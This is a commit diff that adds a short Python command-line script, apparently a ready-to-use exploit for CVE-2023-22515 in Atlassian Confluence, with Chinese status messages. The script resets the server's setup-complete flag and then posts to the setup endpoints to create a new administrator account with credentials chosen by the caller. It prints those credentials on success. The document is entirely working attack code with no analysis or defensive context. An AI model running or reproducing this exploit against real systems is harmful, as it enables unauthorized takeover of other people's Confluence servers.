Create CVE-2023-22515.py

CVE-2023-22515.py

@@ -0,0 +1,41 @@
+import sys
+
+import requests
+
+
+def exp(url, username, password):
+    headers2 = {
+        "X-Atlassian-Token": "no-check",
+        "Content-Type": "application/x-www-form-urlencoded"
+    }
+    headers3 = {
+        "X-Atlassian-Token": "no-check",
+    }
+    data = f"username={username}&fullName={username}&email={username}@localhost&password={password}&confirm={password}&setup-next-button=Next"
+    if url.endswith('/'):  # 去除末尾斜杠
+        url = url[:-1]
+    url1 = url + "/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
+    r1 = requests.get(url=url1)
+    url2 = url + "/setup/setupadministrator.action"
+    r2 = requests.post(url=url2, headers=headers2, data=data, allow_redirects=False)
+    if r2.headers.get("Location") == "/setup/finishsetup.action":
+        url3 = url + "/setup/finishsetup.action"
+        r3 = requests.post(url=url3, headers=headers3)
+        if r3.status_code == 200:
+            print("管理员账户创建成功!")
+            print("账户密码为: " + username + "/" + password)
+        else:
+            print("发生意料之外的错误!")
+    else:
+        print("创建用户失败!")
+        print(r2.headers.get("Location"))
+        print(r2.status_code)
+
+if __name__ == '__main__':
+    if len(sys.argv) != 4:
+        print("用法: python3 CVE-2023-22515.py url username password")
+        sys.exit(1)
+    url = sys.argv[1]
+    username = sys.argv[2]
+    password = sys.argv[3]
+    exp(url, username, password)